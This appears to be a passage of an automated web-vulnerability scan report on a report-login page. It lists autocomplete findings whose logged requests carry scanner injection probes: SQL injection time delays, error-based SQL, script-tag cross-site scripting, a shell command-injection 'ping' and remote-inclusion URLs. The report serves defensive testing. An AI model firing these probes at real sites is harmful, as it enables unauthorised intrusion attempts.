Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=*/netsparker(0x000047)%3b/*" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.111. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x00002C)%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%22%3E%3Cnet%20sparker=netsparker(0x00002C)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x00002C)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.112. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x000015)%20

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27%22%20ns=%20netsparker(0x000015)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x000015)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.113. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.114. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.115. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%3Cscript%3Ens(0x000038)%3C/script%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%3Cscript%3Ens(0x000038)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%3Cscript%3Ens(0x000038)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.116. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.117. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.118. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1%20ns=netsparker(0x00001A)%20

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1%20ns=netsparker(0x00001A)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1%20ns=netsparker(0x00001A)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.119. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x000020

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=//netsparker.com/n/n.css?0x000020 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x000020" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.120. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.121. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%2Bresponse.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.122. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://netsparker.com/n?%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.123. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.124. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.125. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000012)%20

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=%27%22%20ns=%20netsparker(0x000012)%20 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000012)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.126. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


